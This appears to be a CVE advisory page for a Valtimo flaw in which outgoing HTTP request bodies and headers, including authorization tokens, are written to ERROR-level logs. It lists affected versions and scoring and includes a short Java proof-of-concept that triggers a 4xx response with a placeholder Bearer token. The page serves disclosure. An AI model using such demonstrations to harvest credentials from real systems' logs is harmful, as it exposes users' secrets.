Security Vulnerability Report
CVE-2026-44516 CVSS 7.6 HIGH

CVE-2026-44516

Published: 2026-05-14 17:16:23
Last Modified: 2026-05-14 18:14:47

Description

Valtimo is an open-source business process automation platform. From 12.4.0 to 12.33.0 and 13.26.0, the LoggingRestClientCustomizer in the web module automatically intercepts all outgoing HTTP calls made via Spring's RestClient and logs the full request body, response body, and response headers. When an error response is received, this information is included in the thrown HttpClientErrorException message, which is logged at ERROR level by Spring's default exception handling — regardless of the application's DEBUG log level setting. This vulnerability is fixed in 12.33.0 and 13.26.0.

CVSS Details

CVSS Score
7.6
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Valtimo 12.4.0 to 12.33.0 (exclusive)
Valtimo 13.0.0 to 13.26.0 (exclusive)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
java
/*
 * PoC Concept: Trigger a 4xx error to force logging of headers/body.
 * This demonstrates the behavior described in the CVE.
 *
 * Note: a plain RestClient.create() performs no body/header logging on its
 * own. The leak described in the CVE occurs when this code runs inside an
 * affected Valtimo application, where LoggingRestClientCustomizer is applied
 * to the RestClient and the rethrown exception reaches Spring's default
 * exception handling, which logs its message at ERROR level.
 */
import org.springframework.web.client.HttpClientErrorException;
import org.springframework.web.client.RestClient;

public class ValtimoLogLeakPoC {
    public static void main(String[] args) {
        RestClient client = RestClient.create();
        try {
            // Simulate a request carrying a sensitive header to an
            // endpoint that answers with a 4xx status.
            String result = client.get()
                .uri("https://vulnerable-api.example.com/protected/resource")
                .header("Authorization", "Bearer SENSITIVE_TOKEN_HERE")
                .retrieve()
                .body(String.class);
            System.out.println("Unexpected success: " + result);
        } catch (HttpClientErrorException e) {
            // Vulnerable behavior: the application logs the exception 'e',
            // whose message contains the full request headers and body,
            // at ERROR level regardless of the configured DEBUG log level.
            System.err.println("Check server logs for leaked token.");
            throw e;
        }
    }
}

Weakness
CWE-532

References

https://github.com/valtimo-platform/valtimo/security/advisories/GHSA-3jh5-rr2q-xfv7